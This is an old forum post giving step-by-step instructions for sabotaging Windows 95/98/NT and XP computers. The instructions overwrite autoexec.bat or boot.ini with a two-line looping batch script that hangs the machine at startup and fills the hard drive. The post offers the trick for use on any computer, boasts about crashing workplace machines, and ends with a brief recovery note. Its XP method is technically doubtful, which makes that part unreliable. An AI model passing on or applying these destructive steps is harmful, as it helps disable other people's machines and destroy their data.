GoodKat Posted November 5, 2007 Report Posted November 5, 2007 Credits : PhatboosterHow anyone can crash a Windows or MS-DOS computer?Using the simplest of resources a three year old could crash one, andnow you can too. Here is how it is done:==========================Option 1 (for win98/win95/winNT)Go to DOS or open Notepad in accessoriesOpen the autoexec.bat file in the C:\ directoryCopy these two lines into the file:@cd>>x@%0Delete all other lines in the autoexec.batSave==========================Option 2 (for win xp)+ Open –> Control Panel –> System –> Click the “Advance Tab” –>click “settings” under “Startup and Recovery” and edit the“Default Operating System”+ Ninja copy/paste these two lines into the file:@cd>>x@%0Delete all other lines in the boot.iniSave==========================That’s it. No sweat! There is nothing else you have to do, this will fuck up themachine indefinetly. Want to know how it works?The @ symbol preceeding each command makes it so the command is notdisplayed in DOS. cd>>x will copy the current directory into a filecalled x. %0 repeats this command over and over again and lags thecomputers processes. The file called x will eventually fill the harddrive with useless data until nothing else will fit on the hard drive.All you will see when you reboot the computer is this:Starting MS-DOS…The computer will most likely not respond to any commands after that.The way to stop this program from destroying the computer is bootingwith a system disk or holding the shift key on boot. When you’re in DOSdelete the lines from the autoexec.bat file so it won’t fuck it up.Replace the original commands in the autoexe.bat and save it. Reboot.This script written by Phatbooster is completely malicious,I don’t recommend you try it on your own computer, it’s senselessand insane. I got this idea a long time ago from a gurl namedAresgada, it has been tried, tested, andwill work. If I wanted to, I could crash every machine running at myopis, but that would be pointless. Don’t use this for anything dumb,it’s more powerful than it looks, you have been warned. Quote